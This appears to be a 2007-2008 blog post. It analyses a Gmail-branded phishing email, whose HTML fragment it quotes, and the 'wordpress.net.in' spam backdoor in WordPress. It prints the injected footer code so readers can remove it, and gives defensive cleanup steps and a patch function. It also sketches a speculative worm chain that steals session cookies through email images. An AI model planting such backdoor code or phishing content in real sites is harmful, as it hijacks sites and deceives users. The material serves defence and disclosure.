<div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Enter the <strong>Security Characters:.........&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <img style="WIDTH: 125px; HEIGHT: 38px" alt="Registration Verification Code" src="https://ab.login.yahoo.com/img/LVnEpeVZFekTjDHcj06RTVxEZ3._lwVb0bZmRLXJUxldX3JOnZnejReq4nmXD_..xGmoMjBT9h9WFcSARc5o427WyZP6hQ1z1juqhTkOyV68FA04yd2HiHVj.jpg" border="0">
 </strong></div></span></strong></div>
<div class="MsoNormal"><span style="FONT-SIZE: 10pt; COLOR: rgb(18,66,130); FONT-FAMILY: Arial"></span>&nbsp;</div>
<div class="MsoNormal"><span style="FONT-SIZE: 10pt; COLOR: rgb(18,66,130); FONT-FAMILY: Arial"><img style="WIDTH: 148px; HEIGHT: 53px" height="139" src="http://www.genbeta.com/images/2007/01/gmail%20logo%20blanco.gif" width="118">
 </span></div>
<div><strong><span style="FONT-SIZE: 12pt; COLOR: red; FONT-FAMILY: Arial">Warning!!! &nbsp;</span> </strong><strong><span style="FONT-SIZE: 12pt; COLOR: black">Account owner that refuses to update his or her account before two weeks of receiving this warning will lose his or her account permanently.
</span></strong></div>
<div><strong><span style="FONT-SIZE: 12pt; COLOR: black"></span></strong>&nbsp;</div>
<div><strong><span style="FONT-SIZE: 12pt; COLOR: black">Sincerely,</span></strong></div>
<div><strong><span style="FONT-SIZE: 12pt; COLOR: black">Gmail Team</span></strong></div></span></font></td></tr></tbody></table>

------=_Part_11145_31274162.1197116792293--

They used Outlook to published this email and leeched numbers of images across different “known” web services ↓

Image Sources

Gmail Logo: Google Presskit logo

Captcha : yahoo (SSL)

Gmail Logo 2: genbeta.com (might be their host)

Header: EbayStatic Server

Whats the motiff

It may seem funny to read the message as this are pretty much a script kiddies at work. I’m sure that most savvy users will not trust this types of threat. But what most people unaware of is the “Image” portions of the message. It can play a big role for expoiting email.

QuickInfo: Spam “images” trends start around june 2006 and earlier version of popular email client (Outlook and Thunderbird) doesn’t block images by default.

If you are familliar with Internet Security in general,you may notice that there is many attemp and proof of concept method in exploiting Images like “TIFF & JPEG“. Both of this vulnurebilities exists in Internet Explorer Browser and various microsoft windows products. While we can only make educated guesses as there is no real working proof yet.

My doodling scenario produce this ↓

Session “hacker” create a malicious server side image → proxy tunnel send to multiple email server → the curious victim open the email → steal client informations (cookie or server session cookie) → spoof the request → send RST back to client (reset) → dump the victims data in one instance. → write signature on victim email (avoid loop) → propogate using victims session → new net-worm is born

Try digging around VX Heavens & milw0rm Database you’ll find something to start thinkering.

I found this while browsing WordPress support forum, some of these victims update their default_filters.php and upload class-mail.php inside their WordPress without being aware that it’s a backdoor (wordpress.net.in). There is no class-mail.php in WordPress except class-phpmailer.php. So don’t get confuse by it.

Below is a quick workaround on how you can removed the offending goro spamware injection before Google banned you from the internet pipes.

Workaround

• For temporary disable remote include in php.ini settings.

  ;;;;;;;;;;;;;;;;;;
  ; Fopen wrappers ;
  ;;;;;;;;;;;;;;;;;;
  
  ; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
  allow_url_fopen = off
  allow_url_include = off
  

• Check your .htaccess for suspicious redirect.
• Find class-mail.php inside “*/wp-includes/” directory and removed it.
• Find the following code inside “*/wp-includes/default_filters.php” and removed it

  add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775');
  function wpc7c16<>b8466d864eeefd20050625c7775() {
  @include('./wp-includes/class-mail.php');
  if(sizeof($wparr)>0){
  echo "!div id=\"goro\"!";
  foreach($wparr as $k=>$v){
  echo "“.ucwords($v[’key’]).”\n”;
  if($i++==$inum) break;
  }
  echo “!/div!”.$_footer;
  }
  }
  

• Robots.txt Exclusion

  Optional - Prevent googlebot from indexing the static spam page.
  Login to Wordpress Admin > Manage > Files > Other Files → Key in “Robots.txt”. Add the following code.

  User-agent: Googlebot
  Disallow: /*?*
  Disallow: /*?
  

  Refer robots.txt.

Possible WordPress class (suspicious) files that would be tempered

Md5 checksum the following files, compare it with official versions from WordPress Release Archive.

• wp-db.php
• gettext.php

The above methods only remove and disabled the spams links, there is no guarantee that it will protected you from future vulnerabilities. Backup (or export your post using WordPress eXtended RSS -WRX) and perform a full upgrade.

Dec 13, 2007

I just notice this recently. You’ll need to check your site HTTP Header. Most of the hijacked websites doesn’t response with correct HTTP Status Header (400<>500). My guess is they did this to cloak from being crawl by search engine spiders. If you had cleaned all the infected files and your header doesn’t response correctly get a rookit scanner.

Check your website status header, try cloak your browser (UA) as Search Engine Crawler. The following screenshot will show you how to setup this at web-sniffer.net.

This methods may not work if the cloaking scripts used IP base tracking. So try on different user agent string (ie: inoktomi, askjeeves, ia_archiver).

Firefox Browser

You can also override your useragent string with firefox ↓.

about:config → general.useragent.overide = ‘ua strings‘

Wordpress.net.in Backdoor

Extra info

Dec 14, 2007

I did some research at archive.org. It seem our wordpress.net.in Seo Spam has been going on since 2005. The first variant used file_get_contents() PHP functions to retrieve their sources code (A UTF MAP Decoder 1974 Php Class ).

I also found a signature name alxumuk (at MIT & wordpress.net.in). His first historic test can be root back at *.media.mit.edu/~? server (I hide the userid as it may be “false positive”). After my first search on google for alxumuk all the results has been scraped out by Google & “Google alert” so there is no references to this query in Google Index.

My query for file_get_contents include require allintext:1974.* (the UTF decode package) and the signature (alxumuk) will return 403 Forbidden.

As Google Advanced Search blocked “the query” this may confirm that 1974.* (UTF decode) is probably the package for reading the bootstrap for wordpress.net.in backdoor (similar case like perl.santy net worm).

If this is a true Net Worm, I suggest anyone with older versions of Wordpress should removed\ the meta generator tag (Wordpress versions) and disabled XML-RPC(& RSD) for hardening wordpress from remote vectors vulnerabilities.

Wordpress.net.in Doorway

Dec 24, 2007 → http://www.wordpress.net.in/mentors/alxumuk/

Backdoor Files

inside wp-includes directory.

• compat.php - (replace with latest version)
• class-mail.php delete

scan & removes all backdoor files and create a .htaccess file inside wp-includes & wp-content/plugins. Then add the following code to disabled directory listing (prevent informations leak & Directory search index).

Options -Indexes

Wordpress.net.in New Partner

Feb 23th 2008, We found a similar signature like wordpress.net.in at qwetro.com (germany). Probably from the same attacker with different agenda.

removes malicious create_function wp_head filters

This are fixes for wordpress.net.in spams header injection.

/**
 * Remove create_function action hook
 * append on wordpress wp_head filters
 *
 * @author Avice De'véreux <ck@kaizeku.com>
 * @copyright Copyright (c) 2006 Avice De'véreux
 * @version 1.0
 * @license http://www.gnu.org/licenses/lgpl.html GNU Lesser General Public License
 * @link http://blog.kaizeku.com/wordpress/goro-spam-injection-wp-head-patch/
 */
function remove_create_function_action()
{ global $wp_filter;

	$action_ref	= 'wp_head';
	$filter 	= $wp_filter[$action_ref];
	$_lambda	= array();

	foreach(range(1,10) as $priority){

		if (isset($filter[$priority]))
		{
			foreach($filter[$priority] as $registered_filter ){

				$callback = (string) $registered_filter['function'];

				if ( preg_match("/lambda/", $callback) ) {
		 	 		$_lambda[$priority][] = $callback;
				}
			}

		}
	}

	if ( count($_lambda) >= 0 ){

		foreach($_lambda as $priority => $callback) {
			if ( has_filter($action_ref,$callback) ){
				remove_filter($action_ref, $callback, $priority, 1);
			}
		}
	}
}

add_action('init','remove_create_function_action');

The plugin’s can be download at Kaizeku Ban, goro spam injection fixes

Related Posts

• Bluehost HostMonster CEO’s Blog hacked (wordpress.net.in)
• Matt Heaton Bluehost Hostmonster CEO’s Hacked Again - Strike II

External Links

• Websniffer View HTTP Request and Response Header
• Wordpress Support Forum
• National Vulnerability Database Wordpress 2.0 > 2.0.6

Short URL